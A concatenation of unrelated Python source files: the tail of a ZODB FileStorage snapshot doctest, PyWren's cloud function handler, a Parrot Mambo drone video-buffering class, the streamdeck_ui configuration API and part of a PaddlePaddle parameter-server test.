2010-03-09 20:29:00.000000
'\x00\x00\x00\x00\x00\x00\x00\x05'
Of course, we can open the copy:
>>> conn.close()
>>> conn = ZODB.connection('snapshot.fs')
>>> sorted(conn.root().keys()) == range(5)
True
>>> for i in range(5):
... if conn.root()[i].x != 10:
... print('oops', conn.root()[i].x)
>>> time.time, time.sleep = time_time, time_sleep
We get usage if the wrong number or form of arguments are given:
>>> import sys
>>> stderr = sys.stderr
>>> sys.stderr = sys.stdout
>>> argv0 = sys.argv[0]
>>> sys.argv[0] = 'snapshot-in-time'
>>> try: zc.FileStorage.snapshotintime.main([])
... except SystemExit as v: pass
... else: print('oops')
Usage: snapshot-in-time [input-path utc-snapshot-time output-path]
<BLANKLINE>
Make a point-in time snapshot of a file-storage data file containing
just the current records as of the given time. The resulting file can
be used as a basis of a demo storage.
<BLANKLINE>
If the output file isn't given, then a file name will be generated
based on the input file name and the utc-snapshot-time.
<BLANKLINE>
If the utc-snapshot-time is ommitted, then the current time will be used.
<BLANKLINE>
Note: blobs (if any) aren't copied.
<BLANKLINE>
The UTC time is a string of the form: YYYY-MM-DDTHH:MM:SS. The time
conponents are optional. The time defaults to midnight, UTC.
<BLANKLINE>
>>> sys.argv[0] = argv0
>>> try: zc.FileStorage.snapshotintime.main(['xxx', 'xxx', 'xxx'])
... except SystemExit as v: pass
... else: print('oops')
xxx Does not exist.
>>> try: zc.FileStorage.snapshotintime.main(['data.fs', 'xxx', 'xxx'])
... except SystemExit as v: pass
... else: print('oops')
Bad date-time: xxx
>>> sys.stderr = stderr
If you omit the output file, a file name will be generated based on the
time:
>>> zc.FileStorage.snapshotintime.main(['data.fs', copy_time])
>>> sorted(os.listdir('.')) # doctest: +NORMALIZE_WHITESPACE
['data.fs', 'data.fs.index', 'data.fs.lock', 'data.fs.tmp',
'data2010-3-9T20:29:0.fs', 'data2010-3-9T20:29:0.fs.index',
'snapshot.fs', 'snapshot.fs.index', 'snapshot.fs.lock', 'snapshot.fs.tmp']
>>> with open('data2010-3-9T20:29:0.fs', 'rb') as fd1, open('snapshot.fs', 'rb') as fd2:
... fd1.read() == fd2.read()
True
"""
def hexer(data):
if data[:2] == b".h":
return data
return b".h" + binascii.hexlify(data)
def unhexer(data):
if not data:
return data
if data[:2] == b".h":
return binascii.unhexlify(data[2:])
return data
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ZCFileStorageTests, "check"))
suite.addTest(unittest.makeSuite(ZCFileStorageTestsWithBlobs, "check"))
suite.addTest(
doctest.DocFileSuite(
"blob_packing.txt",
setUp=setupstack.setUpDirectory,
tearDown=setupstack.tearDown,
)
)
suite.addTest(
doctest.DocTestSuite(
setUp=setupstack.setUpDirectory, tearDown=setupstack.tearDown
)
)
return suite
|
handler.py
|
#
# Copyright 2018 PyWren Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pika
import time
import json
import pickle
import logging
import tempfile
import traceback
from threading import Thread
from multiprocessing import Process, Pipe
from distutils.util import strtobool
from pywren_ibm_cloud import version
from pywren_ibm_cloud.utils import sizeof_fmt
from pywren_ibm_cloud.config import extract_storage_config
from pywren_ibm_cloud.storage import InternalStorage
from pywren_ibm_cloud.function.jobrunner import JobRunner
from pywren_ibm_cloud.function.utils import get_memory_usage
from pywren_ibm_cloud.config import cloud_logging_config, JOBS_PREFIX
from pywren_ibm_cloud.storage.utils import create_output_key, create_status_key, create_init_key
logging.getLogger('pika').setLevel(logging.CRITICAL)
logger = logging.getLogger('handler')
TEMP = tempfile.gettempdir()
STORAGE_BASE_DIR = os.path.join(TEMP, JOBS_PREFIX)
PYWREN_LIBS_PATH = '/action/pywren_ibm_cloud/libs'
def function_handler(event):
start_time = time.time()
log_level = event['log_level']
cloud_logging_config(log_level)
logger.debug("Action handler started")
extra_env = event.get('extra_env', {})
os.environ.update(extra_env)
os.environ.update({'PYWREN_FUNCTION': 'True',
'PYTHONUNBUFFERED': 'True'})
config = event['config']
call_id = event['call_id']
job_id = event['job_id']
executor_id = event['executor_id']
exec_id = "{}/{}/{}".format(executor_id, job_id, call_id)
logger.info("Execution-ID: {}".format(exec_id))
runtime_name = event['runtime_name']
runtime_memory = event['runtime_memory']
execution_timeout = event['execution_timeout']
logger.debug("Runtime name: {}".format(runtime_name))
logger.debug("Runtime memory: {}MB".format(runtime_memory))
logger.debug("Function timeout: {}s".format(execution_timeout))
func_key = event['func_key']
data_key = event['data_key']
data_byte_range = event['data_byte_range']
storage_config = extract_storage_config(config)
internal_storage = InternalStorage(storage_config)
call_status = CallStatus(config, internal_storage)
call_status.response['host_submit_time'] = event['host_submit_time']
call_status.response['start_time'] = start_time
context_dict = {
'python_version': os.environ.get("PYTHON_VERSION"),
'call_id': call_id,
'job_id': job_id,
'executor_id': executor_id,
'activation_id': os.environ.get('__PW_ACTIVATION_ID')
}
call_status.response.update(context_dict)
show_memory_peak = strtobool(os.environ.get('SHOW_MEMORY_PEAK', 'False'))
call_status.response['peak_memory_usage'] = 0
try:
if version.__version__ != event['pywren_version']:
msg = ("PyWren version mismatch. Host version: {} - Runtime version: {}"
.format(event['pywren_version'], version.__version__))
raise RuntimeError('HANDLER', msg)
# send init status event
call_status.send('__init__')
# call_status.response['free_disk_bytes'] = free_disk_space("/tmp")
custom_env = {'PYWREN_CONFIG': json.dumps(config),
'PYWREN_EXECUTION_ID': exec_id,
'PYTHONPATH': "{}:{}".format(os.getcwd(), PYWREN_LIBS_PATH)}
os.environ.update(custom_env)
jobrunner_stats_dir = os.path.join(STORAGE_BASE_DIR, executor_id, job_id, call_id)
os.makedirs(jobrunner_stats_dir, exist_ok=True)
jobrunner_stats_filename = os.path.join(jobrunner_stats_dir, 'jobrunner.stats.txt')
jobrunner_config = {'pywren_config': config,
'call_id': call_id,
'job_id': job_id,
'executor_id': executor_id,
'func_key': func_key,
'data_key': data_key,
'log_level': log_level,
'data_byte_range': data_byte_range,
'output_key': create_output_key(JOBS_PREFIX, executor_id, job_id, call_id),
'stats_filename': jobrunner_stats_filename}
setup_time = time.time()
call_status.response['setup_time'] = round(setup_time - start_time, 8)
if show_memory_peak:
mm_handler_conn, mm_conn = Pipe()
memory_monitor = Thread(target=memory_monitor_worker, args=(mm_conn, ))
memory_monitor.start()
handler_conn, jobrunner_conn = Pipe()
jobrunner = JobRunner(jobrunner_config, jobrunner_conn, internal_storage)
logger.debug('Starting JobRunner process')
local_execution = strtobool(os.environ.get('__PW_LOCAL_EXECUTION', 'False'))
jrp = Thread(target=jobrunner.run) if local_execution else Process(target=jobrunner.run)
jrp.start()
jrp.join(execution_timeout)
logger.debug('JobRunner process finished')
call_status.response['exec_time'] = round(time.time() - setup_time, 8)
if jrp.is_alive():
# If process is still alive after jr.join(job_max_runtime), kill it
try:
jrp.terminate()
except Exception:
# thread does not have terminate method
pass
msg = ('Function exceeded maximum time of {} seconds and was '
'killed'.format(execution_timeout))
raise TimeoutError('HANDLER', msg)
if show_memory_peak:
mm_handler_conn.send('STOP')
memory_monitor.join()
peak_memory_usage = int(mm_handler_conn.recv())
logger.info("Peak memory usage: {}".format(sizeof_fmt(peak_memory_usage)))
call_status.response['peak_memory_usage'] = peak_memory_usage
if not handler_conn.poll():
logger.error('No completion message received from JobRunner process')
logger.debug('Assuming memory overflow...')
# Only 1 message is returned by jobrunner when it finishes.
# If no message, this means that the jobrunner process was killed.
# 99% of times the jobrunner is killed due an OOM, so we assume here an OOM.
msg = 'Function exceeded maximum memory and was killed'
raise MemoryError('HANDLER', msg)
if os.path.exists(jobrunner_stats_filename):
with open(jobrunner_stats_filename, 'r') as fid:
for l in fid.readlines():
key, value = l.strip().split(" ", 1)
try:
call_status.response[key] = float(value)
except Exception:
call_status.response[key] = value
if key in ['exception', 'exc_pickle_fail', 'result', 'new_futures']:
call_status.response[key] = eval(value)
# call_status.response['server_info'] = get_server_info()
call_status.response['end_time'] = time.time()
except Exception:
# internal runtime exceptions
print('----------------------- EXCEPTION !-----------------------', flush=True)
traceback.print_exc(file=sys.stdout)
print('----------------------------------------------------------', flush=True)
call_status.response['end_time'] = time.time()
call_status.response['exception'] = True
pickled_exc = pickle.dumps(sys.exc_info())
pickle.loads(pickled_exc) # this is just to make sure they can be unpickled
call_status.response['exc_info'] = str(pickled_exc)
finally:
call_status.send('__end__')
for key in extra_env:
del os.environ[key]
logger.info("Finished")
class CallStatus:
def __init__(self, pywren_config, internal_storage):
self.config = pywren_config
self.rabbitmq_monitor = self.config['pywren'].get('rabbitmq_monitor', False)
self.store_status = strtobool(os.environ.get('__PW_STORE_STATUS', 'True'))
self.internal_storage = internal_storage
self.response = {'exception': False}
def send(self, event_type):
self.response['type'] = event_type
if self.store_status:
if self.rabbitmq_monitor:
self._send_status_rabbitmq()
if not self.rabbitmq_monitor or event_type == '__end__':
self._send_status_os()
def _send_status_os(self):
"""
Send the status event to the Object Storage
"""
executor_id = self.response['executor_id']
job_id = self.response['job_id']
call_id = self.response['call_id']
act_id = self.response['activation_id']
if self.response['type'] == '__init__':
init_key = create_init_key(JOBS_PREFIX, executor_id, job_id, call_id, act_id)
self.internal_storage.put_data(init_key, '')
elif self.response['type'] == '__end__':
status_key = create_status_key(JOBS_PREFIX, executor_id, job_id, call_id)
dmpd_response_status = json.dumps(self.response)
drs = sizeof_fmt(len(dmpd_response_status))
logger.info("Storing execution stats - Size: {}".format(drs))
self.internal_storage.put_data(status_key, dmpd_response_status)
def _send_status_rabbitmq(self):
"""
Send the status event to RabbitMQ
"""
dmpd_response_status = json.dumps(self.response)
drs = sizeof_fmt(len(dmpd_response_status))
executor_id = self.response['executor_id']
job_id = self.response['job_id']
rabbit_amqp_url = self.config['rabbitmq'].get('amqp_url')
status_sent = False
output_query_count = 0
params = pika.URLParameters(rabbit_amqp_url)
exchange = 'pywren-{}-{}'.format(executor_id, job_id)
while not status_sent and output_query_count < 5:
output_query_count = output_query_count + 1
try:
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.exchange_declare(exchange=exchange, exchange_type='fanout', auto_delete=True)
channel.basic_publish(exchange=exchange, routing_key='',
body=dmpd_response_status)
connection.close()
logger.info("Execution status sent to rabbitmq - Size: {}".format(drs))
status_sent = True
except Exception as e:
logger.error("Unable to send status to rabbitmq")
logger.error(str(e))
logger.info('Retrying to send status to rabbitmq...')
time.sleep(0.2)
def memory_monitor_worker(mm_conn, delay=0.01):
peak = 0
logger.debug("Starting memory monitor")
def make_measurement(peak):
mem = get_memory_usage(formatted=False) + 5*1024**2
if mem > peak:
peak = mem
return peak
while not mm_conn.poll(delay):
try:
peak = make_measurement(peak)
except Exception:
break
try:
peak = make_measurement(peak)
except Exception as e:
logger.error('Memory monitor: {}'.format(e))
mm_conn.send(peak)
|
MamboVision.py
|
"""
MamboVision is separated from the main Mambo class to enable the use of the drone without the FPV camera.
If you want to do vision processing, you will need to create a MamboVision object to capture the
video stream.
This module relies on the opencv module, which can a bit challenging to compile on the Raspberry Pi.
The instructions here are very helpful:
https://www.pyimagesearch.com/2016/04/18/install-guide-raspberry-pi-3-raspbian-jessie-opencv-3/
I did not use a virtual environment and just installed it in my regular python 2.7 environment.
That webpage said it takes only a few hours but it only compiled in single threaded mode for my RPI 3 and
that took overnight to finish.
Also had to compile ffmpeg and use a MAX_SLICES of 8192. Directions for that are here.
https://github.com/tgogos/rpi_ffmpeg
Author: Amy McGovern, dramymcgovern@gmail.com
"""
import cv2
import threading
import time
class MamboVision:
def __init__(self, fps=10, buffer_size=10):
"""
Setup your vision object and initialize your buffers. You won't start seeing pictures
until you call open_video.
:param fps: frames per second (don't set this very high on a Raspberry Pi!). Defaults to 10 which is a number
that should keep a Raspberry Pi busy but not overheated.
:param buffer_size: number of frames to buffer in memory. Defaults to 10.
"""
self.fps = fps
self.buffer_size = buffer_size
# initialize a buffer (will contain the last buffer_size vision objects)
self.buffer = [None] * buffer_size
self.buffer_index = 0
# setup the thread for monitoring the vision (but don't start it until we connect in open_video)
self.vision_thread = threading.Thread(target=self._buffer_vision, args=(fps, buffer_size))
self.vision_running = True
def open_video(self, max_retries=3):
"""
Open the video stream in opencv for capturing and processing. The address for the stream
is the same for all Mambos and is documented here:
http://forum.developer.parrot.com/t/streaming-address-of-mambo-fpv-for-videoprojection/6442/6
Remember that this will only work if you have connected to the wifi for your mambo!
:param max_retries: Maximum number of retries in opening the camera (remember to connect to camera wifi!).
Defaults to 3.
:param fps: frames per second (don't set this very high on a Raspberry Pi!). Defaults to 10 which is a number
that should keep a Raspberry Pi busy but not overheated.
:param buffer_size: number of frames to buffer in memory. Defaults to 10.
:return True if the vision opened correctly and False otherwise
"""
print "opening the camera"
self.capture = cv2.VideoCapture("rtsp://192.168.99.1/media/stream2")
#print self.capture.get(cv2.CV_CAP_PROPS_FPS)
# if it didn't open the first time, try again a maximum number of times
try_num = 1
while (not self.capture.isOpened() and try_num < max_retries):
print "re-trying to open the capture"
self.capture = cv2.VideoCapture("rtsp://192.168.99.1/media/stream2")
try_num += 1
# return whether the vision opened
return self.capture.isOpened()
def start_video_buffering(self):
"""
If the video capture was successfully opened, then start the thread to buffer the stream
:return:
"""
if (self.capture.isOpened()):
print "starting vision thread"
self.vision_thread.start()
def _buffer_vision(self, fps, buffer_size):
"""
Internal method to save valid video captures from the camera fps times a second
:param fps: frames per second (set in init)
:param buffer_size: number of images to buffer (set in init)
:return:
"""
while (self.vision_running):
# grab the latest image
print "grabbing frame"
capture_correct, video_frame = self.capture.read()
print capture_correct
if (capture_correct):
self.buffer_index += 1
self.buffer_index %= buffer_size
print "saving frame to buffer"
#print video_frame
self.buffer[self.buffer_index] = video_frame
# put the thread back to sleep for fps
print "sleeping for %f" % (1.0 / fps)
time.sleep(1.0 / fps)
def get_latest_valid_picture(self):
"""
Return the latest valid image (from the buffer)
:return: last valid image received from the Mambo
"""
return self.buffer[self.buffer_index]
def stop_vision_buffering(self):
"""
Should stop the vision thread
"""
self.vision_running = False
|
api.py
|
"""Defines the Python API for interacting with the StreamDeck Configuration UI"""
import json
import sys
import os
from pathlib import Path
import threading
from functools import partial
import shlex, subprocess
from typing import Dict, List, Tuple, Union
from warnings import warn
from PIL import Image, ImageDraw, ImageFont
from pynput.keyboard import Controller, Key
from StreamDeck import DeviceManager, ImageHelpers
from StreamDeck.Devices import StreamDeck
from StreamDeck.ImageHelpers import PILHelper
from streamdeck_ui.config import CONFIG_FILE_VERSION, DEFAULT_FONT, FONTS_PATH, STATE_FILE
image_cache: Dict[str, memoryview] = {}
decks: Dict[str, StreamDeck.StreamDeck] = {}
state: Dict[str, Dict[str, Union[int, Dict[int, Dict[int, Dict[str, str]]]]]] = {}
keyboard = Controller()
live_functions: List = []
def _run_process(command: str):
""" Implement a double-fork to detach process"""
pid = os.fork()
if pid > 0:
# in main process: wait for first fork
pid2, status = os.waitpid(pid, 0)
if (status != 0):
print("fork #1 failed: return code: {}".format(status))
return
os.setsid()
# in first fork: do second fork
try:
pid = os.fork()
if pid > 0:
# in first fork: exit without atexit handler
os._exit(0)
except OSError as e:
print ("fork #2 failed: {} ({})".format(e.errno, e.strerror))
os._exit(1)
# in second fork: Detach the process, so killing StreamDeck doesn't take it with
args = shlex.split(command)
os.execv(args[0], args)
def _key_change_callback(deck_id: str, _deck: StreamDeck.StreamDeck, key: int, state: bool) -> None:
if state:
page = get_page(deck_id)
# Command running
command = get_button_command(deck_id, page, key)
if command:
try:
#subprocess.Popen(shlex.split(command),cwd=Path.home())
_run_process(command)
except Exception as e:
print('Cannot exec command "{}" Exception: {} {}'.format(command, sys.exc_info()[0], getattr(e, "message", e) ))
pass
# Key press emulation
keys = get_button_keys(deck_id, page, key)
if keys:
keys = keys.strip().replace(" ", "")
for section in keys.split(","):
pressed_keys = []
try:
for key_name in section.split("+"):
keycode = getattr(Key, key_name.lower(), key_name)
keyboard.press(keycode)
pressed_keys.append(key_name)
except Exception as e:
try:
print("An exception '{}' occured during Key press of {} (keycode: {}): {}"
.format(sys.exc_info()[0], key_name, keycode, getattr(e, "message", e)))
pass
except:
pass
finally:
for key_name in pressed_keys:
keyboard.release(getattr(Key, key_name.lower(), key_name))
# Text writing
write = get_button_write(deck_id, page, key)
if write:
keyboard.type(write)
# Brightness
brightness_change = get_button_change_brightness(deck_id, page, key)
if brightness_change:
change_brightness(deck_id, brightness_change)
# Page switch
switch_page = get_button_switch_page(deck_id, page, key)
if switch_page:
set_page(deck_id, switch_page - 1)
def _save_state():
export_config(STATE_FILE)
def _open_config(config_file: str):
global state
with open(config_file) as state_file:
config = json.loads(state_file.read())
file_version = config.get("streamdeck_ui_version", 0)
if file_version != CONFIG_FILE_VERSION:
raise ValueError(
"Incompatible version of config file found: "
f"{file_version} does not match required version "
f"{CONFIG_FILE_VERSION}."
)
state = {}
for deck_id, deck in config["state"].items():
deck["buttons"] = {
int(page_id): {int(button_id): button for button_id, button in buttons.items()}
for page_id, buttons in deck.get("buttons", {}).items()
}
state[deck_id] = deck
def import_config(config_file: str) -> None:
_open_config(config_file)
render()
_save_state()
def export_config(output_file: str) -> None:
with open(output_file, "w") as state_file:
state_file.write(
json.dumps(
{"streamdeck_ui_version": CONFIG_FILE_VERSION, "state": state},
indent=4,
separators=(",", ": "),
)
)
def open_decks() -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
"""Opens and then returns all known stream deck devices"""
for deck in DeviceManager.DeviceManager().enumerate():
deck.open()
deck.reset()
deck_id = deck.get_serial_number()
decks[deck_id] = deck
deck.set_key_callback(partial(_key_change_callback, deck_id))
return {
deck_id: {"type": deck.deck_type(), "layout": deck.key_layout()}
for deck_id, deck in decks.items()
}
def ensure_decks_connected() -> None:
"""Reconnects to any decks that lost connection. If they did, re-renders them."""
for deck_serial, deck in decks.copy().items():
if not deck.connected():
for new_deck in DeviceManager.DeviceManager().enumerate():
try:
new_deck.open()
new_deck_serial = new_deck.get_serial_number()
except Exception as error:
warn(f"A {error} error occurred when trying to reconnect to {deck_serial}")
new_deck_serial = None
if new_deck_serial == deck_serial:
deck.close()
new_deck.reset()
new_deck.set_key_callback(partial(_key_change_callback, new_deck_serial))
decks[new_deck_serial] = new_deck
render()
def get_deck(deck_id: str) -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
return {"type": decks[deck_id].deck_type(), "layout": decks[deck_id].key_layout()}
def _button_state(deck_id: str, page: int, button: int) -> dict:
buttons = state.setdefault(deck_id, {}).setdefault("buttons", {})
buttons_state = buttons.setdefault(page, {}) # type: ignore
return buttons_state.setdefault(button, {}) # type: ignore
class LiveFunction:
def __init__(self, deck_id: str, page: int, button: int, function_to_run, args):
self.deck_id = deck_id
self.page = page
self.button = button
self.function = function_to_run
self.function_args = args
def __eq__(self, other):
if self.deck_id != other.deck_id:
return False
if self.page != other.page:
return False
if self.button != other.button:
return False
if self.function != other.function:
return False
if self.function_args != other.function_args:
return False
return True
def __hash__(self):
return hash(f"{self.deck_id}{self.page}{self.button}")
def remove_all_from_btn(self):
lf_to_remove = []
for live_function in live_functions:
if self.deck_id == live_function.deck_id and self.page == live_function.page and self.button == live_function.button:
lf_to_remove.append(live_function)
for lf in lf_to_remove:
live_functions.remove(lf)
def btn_has_diff_function_running(self):
return any(self.deck_id == f.deck_id and self.page == f.page and self.button == f.button and (self.function != f.function or self.function_args != f.function_args) for f in live_functions)
def _set_button_live_info(deck_id: str, page: int, button: int, start: bool, func, *args):
import threading
live_function = LiveFunction(deck_id, page, button, func, *args)
if not start:
live_function.remove_all_from_btn()
# Clear Text
set_button_info(deck_id, page, button, "")
return
if live_function.btn_has_diff_function_running():
live_function.remove_all_from_btn()
# Already registered, skip and carry on
if live_function in live_functions:
return
live_functions.append(live_function)
# Ensure we don't kick off multiple threads at once
thread_name = "live_updater"
if any(thread.name == thread_name for thread in threading.enumerate()):
return
thread = threading.Thread(name=thread_name, target=_start_live_updater)
thread.daemon = True
thread.start()
def set_button_live_time(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display live time every second"""
_button_state(deck_id, page, button)["font_size"] = 14
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%H:%M:%S"])
def _get_current_time(date_format: str):
from datetime import datetime
return datetime.now().strftime(date_format)
def set_button_live_hour(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display the current hour"""
# Set Font
_button_state(deck_id, page, button)["font_size"] = 48
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%H"])
def set_button_live_minute(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display the current minute"""
_button_state(deck_id, page, button)["font_size"] = 48
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%M"])
def _start_live_updater():
import time
while len(live_functions) > 0:
for live_function in live_functions:
result = live_function.function(*live_function.function_args)
set_button_info(live_function.deck_id, live_function.page, live_function.button, result)
time.sleep(1)
def set_button_text(deck_id: str, page: int, button: int, text: str) -> None:
"""Set the text associated with a button"""
_button_state(deck_id, page, button)["text"] = text
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_text(deck_id: str, page: int, button: int) -> str:
"""Returns the text set for the specified button"""
return _button_state(deck_id, page, button).get("text", "")
def set_button_icon(deck_id: str, page: int, button: int, icon: str) -> None:
"""Sets the icon associated with a button"""
_button_state(deck_id, page, button)["icon"] = icon
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_icon(deck_id: str, page: int, button: int) -> str:
"""Returns the icon set for a particular button"""
return _button_state(deck_id, page, button).get("icon", "")
def set_button_info(deck_id: str, page: int, button: int, info: str) -> None:
"""Set the information associated with a button"""
_button_state(deck_id, page, button)["information"] = info
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_info(deck_id: str, page: int, button: int) -> str:
"""Returns the information set for the specified button"""
return _button_state(deck_id, page, button).get("information", "")
def set_button_change_brightness(deck_id: str, page: int, button: int, amount: int) -> None:
"""Sets the brightness changing associated with a button"""
_button_state(deck_id, page, button)["brightness_change"] = amount
render()
_save_state()
def get_button_change_brightness(deck_id: str, page: int, button: int) -> int:
"""Returns the brightness change set for a particular button"""
return _button_state(deck_id, page, button).get("brightness_change", 0)
def set_button_command(deck_id: str, page: int, button: int, command: str) -> None:
"""Sets the command associated with the button"""
_button_state(deck_id, page, button)["command"] = command
_save_state()
def get_button_command(deck_id: str, page: int, button: int) -> str:
"""Returns the command set for the specified button"""
return _button_state(deck_id, page, button).get("command", "")
def set_button_switch_page(deck_id: str, page: int, button: int, switch_page: int) -> None:
"""Sets the page switch associated with the button"""
_button_state(deck_id, page, button)["switch_page"] = switch_page
_save_state()
def get_button_switch_page(deck_id: str, page: int, button: int) -> int:
"""Returns the page switch set for the specified button. 0 implies no page switch."""
return _button_state(deck_id, page, button).get("switch_page", 0)
def set_button_information_index(deck_id: str, page: int, button: int, info_index: int) -> None:
"""Sets the Information index for the given button"""
_button_state(deck_id, page, button)["information_index"] = info_index
_save_state()
def get_button_information_index(deck_id: str, page: int, button: int) -> int:
"""Returns the index of the 'Information' dropdown for the specified button."""
return _button_state(deck_id, page, button).get("information_index", 0)
def set_button_keys(deck_id: str, page: int, button: int, keys: str) -> None:
"""Sets the keys associated with the button"""
_button_state(deck_id, page, button)["keys"] = keys
_save_state()
def get_button_keys(deck_id: str, page: int, button: int) -> str:
"""Returns the keys set for the specified button"""
return _button_state(deck_id, page, button).get("keys", "")
def set_button_write(deck_id: str, page: int, button: int, write: str) -> None:
"""Sets the text meant to be written when button is pressed"""
_button_state(deck_id, page, button)["write"] = write
_save_state()
def get_button_write(deck_id: str, page: int, button: int) -> str:
"""Returns the text to be produced when the specified button is pressed"""
return _button_state(deck_id, page, button).get("write", "")
def set_brightness(deck_id: str, brightness: int) -> None:
"""Sets the brightness for every button on the deck"""
decks[deck_id].set_brightness(brightness)
state.setdefault(deck_id, {})["brightness"] = brightness
_save_state()
def get_brightness(deck_id: str) -> int:
"""Gets the brightness that is set for the specified stream deck"""
return state.get(deck_id, {}).get("brightness", 100) # type: ignore
def change_brightness(deck_id: str, amount: int = 1) -> None:
"""Change the brightness of the deck by the specified amount"""
set_brightness(deck_id, max(min(get_brightness(deck_id) + amount, 100), 0))
def get_page(deck_id: str) -> int:
"""Gets the current page shown on the stream deck"""
return state.get(deck_id, {}).get("page", 0) # type: ignore
def set_page(deck_id: str, page: int) -> None:
"""Sets the current page shown on the stream deck"""
state.setdefault(deck_id, {})["page"] = page
render()
_save_state()
def render() -> None:
"""renders all decks"""
for deck_id, deck_state in state.items():
deck = decks.get(deck_id, None)
if not deck:
warn(f"{deck_id} has settings specified but is not seen. Likely unplugged!")
continue
page = get_page(deck_id)
for button_id, button_settings in (
deck_state.get("buttons", {}).get(page, {}).items() # type: ignore
):
key = f"{deck_id}.{page}.{button_id}"
if key in image_cache:
image = image_cache[key]
else:
image = _render_key_image(deck, **button_settings)
image_cache[key] = image
deck.set_key_image(button_id, image)
def _render_key_image(deck, icon: str = "", text: str = "", information: str = "", font: str = DEFAULT_FONT, **kwargs):
"""Renders an individual key image"""
image = ImageHelpers.PILHelper.create_image(deck)
draw = ImageDraw.Draw(image)
font_size = kwargs.get("font_size") if kwargs.get("font_size") else 14
# Give information priority over text
if information:
text = information
if icon:
rgba_icon = Image.open(icon).convert("RGBA")
else:
rgba_icon = Image.new("RGBA", (300, 300))
icon_width, icon_height = image.width, image.height
if text:
icon_height -= 20
rgba_icon.thumbnail((icon_width, icon_height), Image.LANCZOS)
icon_pos = ((image.width - rgba_icon.width) // 2, 0)
image.paste(rgba_icon, icon_pos, rgba_icon)
if text:
true_font = ImageFont.truetype(os.path.join(FONTS_PATH, font), font_size)
label_w, label_h = draw.textsize(text, font=true_font)
if icon:
label_pos = ((image.width - label_w) // 2, image.height - 20)
else:
label_pos = ((image.width - label_w) // 2, ((image.height - label_h) // 2))
draw.text(label_pos, text=text, font=true_font, fill="white")
return ImageHelpers.PILHelper.to_native_format(deck, image)
if os.path.isfile(STATE_FILE):
_open_config(STATE_FILE)
|
test_recv_save_op.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import signal
import time
import shutil
import unittest
from multiprocessing import Process
import numpy as np
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.op import Operator
from paddle.fluid.framework import Program, program_guard
from paddle.fluid.transpiler.details import VarStruct, VarsDistributed
from dist_test_utils import *
from paddle.fluid.incubate.fleet.parameter_server.mode import DistributedMode
def run_pserver(pserver_id):
remove_ps_flag(os.getpid())
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create table parameter in scope
place = fluid.CPUPlace()
# create and initialize Param Variable
param = scope.var('table').get_tensor()
param_array = np.ones((5, 8)).astype("float32")
for i in range(len(param_array)):
param_array[i] *= param_array[i] * i + pserver_id * 10 + 1
param.set(param_array, place)
optimize_block = program._create_block(program.global_block().idx)
program.global_block().append_op(
type="listen_and_serv",
inputs={'X': []},
outputs={},
attrs={
"optimize_blocks": [optimize_block],
"endpoint": '127.0.0.1:0',
"Fanin": 1,
"distributed_mode": DistributedMode.SYNC,
"grad_to_block_id": []
})
exe = fluid.Executor(place)
exe.run(program)
@unittest.skip("do not need currently")
class TestListenAndServOp(unittest.TestCase):
def setUp(self):
self.ps_timeout = 5
def _start_pserver(self, pserver_id, pserver_func):
p = Process(target=pserver_func, args=(pserver_id, ))
p.daemon = True
p.start()
return p
def _wait_ps_ready(self, pid):
start_left_time = self.ps_timeout
sleep_time = 0.5
while True:
assert start_left_time >= 0, "wait ps ready failed"
time.sleep(sleep_time)
try:
# the listen_and_serv_op would touch a file which contains the listen port
# on the /tmp directory until it was ready to process all the RPC call.
os.stat("/tmp/paddle.%d.port" % pid)
return
except os.error:
start_left_time -= sleep_time
def _get_pserver_port(self, pid):
with open("/tmp/paddle.%d.port" % pid, 'r') as f:
port = int(f.read().strip())
return port
def _run_nce_op_two_pserver(self, place, port0, port1, model_file):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
emaps = ['127.0.0.1:' + str(port0), '127.0.0.1:' + str(port1)]
# create and run recv and save operator
remote_recv_op = Operator(
"recv_save",
trainer_id=0,
shape=[10, 8],
slice_shapes=["5,8", "5,8"],
slice_varnames=["table", "table"],
remote_varnames=['table', 'table'],
is_sparse=False,
endpoints=emaps,
file_path=model_file)
remote_recv_op.run(scope, place)
def _load_slice_var(self, model_file):
load_prog = fluid.Program()
load_block = load_prog.global_block()
origin = load_block.create_var(
name="var.origin",
type=fluid.core.VarDesc.VarType.LOD_TENSOR,
shape=[10, 8],
dtype="float32",
persistable=True)
slice0 = load_block.create_var(
name="var.slice0",
type=fluid.core.VarDesc.VarType.LOD_TENSOR,
shape=[3, 8],
dtype="float32",
persistable=True)
slice1 = load_block.create_var(
name="var.slice1",
type=fluid.core.VarDesc.VarType.LOD_TENSOR,
shape=[5, 8],
dtype="float32",
persistable=True)
load_block.append_op(
type='load',
inputs={},
